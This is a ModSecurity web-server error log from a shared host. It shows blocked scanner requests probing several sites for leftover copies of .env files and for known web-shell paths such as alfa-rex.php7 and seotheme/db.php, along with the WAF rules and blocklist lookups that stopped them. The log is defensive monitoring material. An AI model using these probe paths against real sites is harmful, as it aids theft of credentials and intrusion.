[Tue May 26 13:48:36.172707 2026] [security2:error] [pid 555743:tid 555989] [client 20.205.111.246:1932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/asus.php"] [unique_id "ahVXXMjqAquC0YaxQjCrvAAAAX4"]
[Tue May 26 13:48:36.578935 2026] [security2:error] [pid 555743:tid 555998] [client 15.235.169.50:57563] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/web.php"] [unique_id "ahVXXMjqAquC0YaxQjCrzQAAAYc"]
[Tue May 26 13:48:36.593755 2026] [security2:error] [pid 555743:tid 555875] [client 20.206.67.134:1480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/wp-plain.php"] [unique_id "ahVXXMjqAquC0YaxQjCrzgAAAQw"], referer: www.google.com
[Tue May 26 13:48:36.747736 2026] [security2:error] [pid 555743:tid 555879] [client 5.255.121.146:52592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.production.copy"] [unique_id "ahVXXMjqAquC0YaxQjCr1gAAARA"]
[Tue May 26 13:48:36.866132 2026] [security2:error] [pid 555743:tid 555916] [client 129.222.147.134:44400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXXMjqAquC0YaxQjCr5wAAATU"]
[Tue May 26 13:48:36.867083 2026] [security2:error] [pid 555743:tid 555916] [client 129.222.147.134:44400] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXXMjqAquC0YaxQjCr5wAAATU"]
[Tue May 26 13:48:36.869116 2026] [security2:error] [pid 555743:tid 555997] [client 20.205.111.246:1659] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/about.php"] [unique_id "ahVXXMjqAquC0YaxQjCr6AAAAYY"]
[Tue May 26 13:48:37.065190 2026] [security2:error] [pid 555743:tid 555880] [client 15.235.169.50:57665] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/ws.php"] [unique_id "ahVXXcjqAquC0YaxQjCr8AAAARE"]
[Tue May 26 13:48:37.097857 2026] [security2:error] [pid 555743:tid 555941] [client 20.206.67.134:5843] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVXXcjqAquC0YaxQjCr9AAAAU4"]
[Tue May 26 13:48:37.124359 2026] [security2:error] [pid 555743:tid 555967] [client 5.255.121.146:52926] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.production.orig"] [unique_id "ahVXXcjqAquC0YaxQjCr9wAAAWg"]
[Tue May 26 13:48:37.125292 2026] [security2:error] [pid 555743:tid 555915] [client 5.255.121.146:52782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.swp"] [unique_id "ahVXXcjqAquC0YaxQjCr-gAAATQ"]
[Tue May 26 13:48:37.125905 2026] [security2:error] [pid 555743:tid 555873] [client 5.255.121.146:52810] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.local.bak"] [unique_id "ahVXXcjqAquC0YaxQjCr-wAAAQo"]
[Tue May 26 13:48:37.125926 2026] [security2:error] [pid 555743:tid 555920] [client 5.255.121.146:52658] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.bak"] [unique_id "ahVXXcjqAquC0YaxQjCr-QAAATk"]
[Tue May 26 13:48:37.126561 2026] [security2:error] [pid 555743:tid 555989] [client 5.255.121.146:52788] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.orig"] [unique_id "ahVXXcjqAquC0YaxQjCr_gAAAX4"]
[Tue May 26 13:48:37.126784 2026] [security2:error] [pid 555743:tid 555970] [client 5.255.121.146:52850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.local.swp"] [unique_id "ahVXXcjqAquC0YaxQjCr_QAAAWs"]
[Tue May 26 13:48:37.127072 2026] [security2:error] [pid 555743:tid 555915] [client 5.255.121.146:52752] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.production.old"] [unique_id "ahVXXcjqAquC0YaxQjCsAgAAATQ"]
[Tue May 26 13:48:37.127420 2026] [security2:error] [pid 555743:tid 555913] [client 5.255.121.146:52818] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.local.old"] [unique_id "ahVXXcjqAquC0YaxQjCsAQAAATI"]
[Tue May 26 13:48:37.127579 2026] [security2:error] [pid 555743:tid 555943] [client 5.255.121.146:52910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.production.swp"] [unique_id "ahVXXcjqAquC0YaxQjCsBAAAAVA"]
[Tue May 26 13:48:37.127921 2026] [security2:error] [pid 555743:tid 555896] [client 5.255.121.146:52826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.local.backup"] [unique_id "ahVXXcjqAquC0YaxQjCsAAAAASE"]
[Tue May 26 13:48:37.127969 2026] [security2:error] [pid 555743:tid 555901] [client 5.255.121.146:52868] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.production.bak"] [unique_id "ahVXXcjqAquC0YaxQjCr_wAAASY"]
[Tue May 26 13:48:37.128069 2026] [security2:error] [pid 555743:tid 555989] [client 5.255.121.146:52904] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.production~"] [unique_id "ahVXXcjqAquC0YaxQjCsBwAAAX4"]
[Tue May 26 13:48:37.128408 2026] [security2:error] [pid 555743:tid 555920] [client 5.255.121.146:52760] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env~"] [unique_id "ahVXXcjqAquC0YaxQjCsBQAAATk"]
[Tue May 26 13:48:37.128905 2026] [security2:error] [pid 555743:tid 555942] [client 5.255.121.146:52838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.local~"] [unique_id "ahVXXcjqAquC0YaxQjCsCQAAAU8"]
[Tue May 26 13:48:37.129298 2026] [security2:error] [pid 555743:tid 555897] [client 5.255.121.146:52796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.copy"] [unique_id "ahVXXcjqAquC0YaxQjCsCgAAASI"]
[Tue May 26 13:48:37.129852 2026] [security2:error] [pid 555743:tid 555969] [client 5.255.121.146:52862] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.local.copy"] [unique_id "ahVXXcjqAquC0YaxQjCsDAAAAWo"]
[Tue May 26 13:48:37.130508 2026] [security2:error] [pid 555743:tid 555924] [client 5.255.121.146:52732] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.old"] [unique_id "ahVXXcjqAquC0YaxQjCsCwAAAT0"]
[Tue May 26 13:48:37.130514 2026] [security2:error] [pid 555743:tid 555920] [client 5.255.121.146:52860] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.local.orig"] [unique_id "ahVXXcjqAquC0YaxQjCsDwAAATk"]
[Tue May 26 13:48:37.130725 2026] [security2:error] [pid 555743:tid 555986] [client 5.255.121.146:52880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.production.backup"] [unique_id "ahVXXcjqAquC0YaxQjCsCAAAAXs"]
[Tue May 26 13:48:37.131126 2026] [security2:error] [pid 555743:tid 555994] [client 5.255.121.146:52768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.backup"] [unique_id "ahVXXcjqAquC0YaxQjCsEAAAAYM"]
[Tue May 26 13:48:37.538153 2026] [security2:error] [pid 555743:tid 555960] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXXMjqAquC0YaxQjCr6wAAAWE"]
[Tue May 26 13:48:37.560995 2026] [security2:error] [pid 555743:tid 555957] [client 15.235.169.50:57759] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/simple.php"] [unique_id "ahVXXcjqAquC0YaxQjCsJQAAAV4"]
[Tue May 26 13:48:37.569128 2026] [security2:error] [pid 555743:tid 555909] [client 20.205.111.246:1977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/atomlib.php"] [unique_id "ahVXXcjqAquC0YaxQjCsJwAAAS4"]
[Tue May 26 13:48:37.860229 2026] [security2:error] [pid 555743:tid 555920] [client 20.206.67.134:5856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVXXcjqAquC0YaxQjCsOAAAATk"], referer: www.google.com
[Tue May 26 13:48:38.029035 2026] [security2:error] [pid 555743:tid 555992] [client 15.235.169.50:57878] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/upgrade/about.php"] [unique_id "ahVXXsjqAquC0YaxQjCsOQAAAYE"]
[Tue May 26 13:48:38.274400 2026] [security2:error] [pid 555743:tid 555959] [client 20.205.111.246:1568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/alfa-rex.php7"] [unique_id "ahVXXsjqAquC0YaxQjCsPgAAAWA"]
[Tue May 26 13:48:38.489742 2026] [security2:error] [pid 555743:tid 555996] [client 15.235.169.50:57959] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVXXsjqAquC0YaxQjCsggAAAYU"]
[Tue May 26 13:48:38.784383 2026] [security2:error] [pid 555743:tid 555954] [client 185.191.171.18:30966] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-6th/day/2023-01-26/"] [unique_id "ahVXXsjqAquC0YaxQjCsiQAAAVs"]
[Tue May 26 13:48:38.784482 2026] [security2:error] [pid 555743:tid 555954] [client 185.191.171.18:30966] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-6th/day/2023-01-26/"] [unique_id "ahVXXsjqAquC0YaxQjCsiQAAAVs"]
[Tue May 26 13:48:38.954282 2026] [security2:error] [pid 555743:tid 555973] [client 20.205.111.246:1617] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/b.php"] [unique_id "ahVXXsjqAquC0YaxQjCslAAAAW4"]
[Tue May 26 13:48:38.973770 2026] [security2:error] [pid 555743:tid 555974] [client 15.235.169.50:58031] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVXXsjqAquC0YaxQjCslwAAAW8"]
[Tue May 26 13:48:39.210935 2026] [security2:error] [pid 555743:tid 555964] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXXsjqAquC0YaxQjCsiAAAAWU"]
[Tue May 26 13:48:39.448694 2026] [security2:error] [pid 555743:tid 555949] [client 15.235.169.50:58103] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/user/about.php"] [unique_id "ahVXX8jqAquC0YaxQjCspQAAAVY"]
[Tue May 26 13:48:39.649124 2026] [security2:error] [pid 555743:tid 555883] [client 20.205.111.246:1575] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/buy.php"] [unique_id "ahVXX8jqAquC0YaxQjCsrQAAARQ"]
[Tue May 26 13:48:39.935340 2026] [security2:error] [pid 555743:tid 555922] [client 15.235.169.50:58178] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/upgrade/cloud.php"] [unique_id "ahVXX8jqAquC0YaxQjCstQAAATs"]
[Tue May 26 13:48:40.074738 2026] [security2:error] [pid 555743:tid 555973] [client 20.206.67.134:1473] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/jujwbdei.php"] [unique_id "ahVXYMjqAquC0YaxQjCsuwAAAW4"], referer: www.google.com
[Tue May 26 13:48:40.393269 2026] [security2:error] [pid 555743:tid 555916] [client 20.205.111.246:1076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/bless.php"] [unique_id "ahVXYMjqAquC0YaxQjCsxgAAATU"]
[Tue May 26 13:48:40.426050 2026] [security2:error] [pid 555743:tid 555926] [client 15.235.169.50:58250] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/moon.php"] [unique_id "ahVXYMjqAquC0YaxQjCsyAAAAT8"]
[Tue May 26 13:48:40.441634 2026] [security2:error] [pid 555743:tid 555909] [client 2.58.56.196:54482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVXYMjqAquC0YaxQjCsxQAAAS4"], referer: www.google.com
[Tue May 26 13:48:40.489399 2026] [security2:error] [pid 555743:tid 555921] [client 2.58.56.196:54481] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVXYMjqAquC0YaxQjCsyQAAATo"]
[Tue May 26 13:48:40.502978 2026] [security2:error] [pid 555743:tid 555940] [client 2.58.56.196:54478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/wp-plain.php"] [unique_id "ahVXYMjqAquC0YaxQjCsygAAAU0"], referer: www.google.com
[Tue May 26 13:48:40.680557 2026] [security2:error] [pid 555743:tid 555938] [client 2.58.56.196:54488] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/avpbedjo.php"] [unique_id "ahVXYMjqAquC0YaxQjCs1QAAAUs"], referer: www.google.com
[Tue May 26 13:48:40.898952 2026] [security2:error] [pid 555743:tid 555976] [client 15.235.169.50:58353] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/inc.php"] [unique_id "ahVXYMjqAquC0YaxQjCs3gAAAXE"]
[Tue May 26 13:48:40.979379 2026] [security2:error] [pid 555743:tid 555874] [client 2.58.56.196:54516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVXYMjqAquC0YaxQjCs4gAAAQs"], referer: www.google.com
[Tue May 26 13:48:41.077712 2026] [http2:info] [pid 560287:tid 560287] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 13:48:41.144192 2026] [security2:error] [pid 555743:tid 555925] [client 20.205.111.246:1572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/class-t.api.php"] [unique_id "ahVXYcjqAquC0YaxQjCs5wAAAT4"]
[Tue May 26 13:48:41.222184 2026] [security2:error] [pid 555743:tid 555999] [client 20.206.67.134:5102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVXYcjqAquC0YaxQjCs7gAAAYg"]
